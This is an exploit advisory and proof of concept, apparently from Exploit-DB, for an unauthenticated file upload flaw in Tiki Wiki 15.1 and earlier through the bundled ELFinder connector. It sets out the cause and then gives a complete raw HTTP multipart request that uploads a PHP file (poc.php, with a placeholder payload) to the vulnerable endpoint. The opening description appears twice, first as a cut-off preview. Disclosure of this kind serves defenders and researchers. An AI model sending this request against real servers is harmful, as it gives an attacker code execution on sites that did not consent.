### 1. Description A file upload vulnerability in Tiki Wiki <= 15.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The issue comes with one of the 3rd party components. Name of that components is ELFinder -version 2.0-. This components comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1. ### 2. PoC ``` POST /vendor_extra/elfinder/php/connector.minimal.php HTTP/1.1 Host: example.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_830_1251049035_1498898101 Content-Length: 1734 Connection: close --_Part_830_1251049035_1498898101 Content-Disposition: form-data; name="cmd" upload...
### 1. Description A file upload vulnerability in Tiki Wiki <= 15.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The issue comes with one of the 3rd party components. Name of that components is ELFinder -version 2.0-. This components comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1. ### 2. PoC ``` POST /vendor_extra/elfinder/php/connector.minimal.php HTTP/1.1 Host: example.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_830_1251049035_1498898101 Content-Length: 1734 Connection: close --_Part_830_1251049035_1498898101 Content-Disposition: form-data; name="cmd" upload --_Part_830_1251049035_1498898101 Content-Disposition: form-data; name="target" l1_Lw --_Part_830_1251049035_1498898101 Content-Disposition: form-data; name="upload[]"; filename="poc.php" Content-Type: application/octet-stream <?php payload ?> --_Part_830_1251049035_1498898101-- ``` ### 3. Info Author: Mehmet Ince <mehmet@mehmetince.net> https://www.exploit-db.com/exploits/40091/
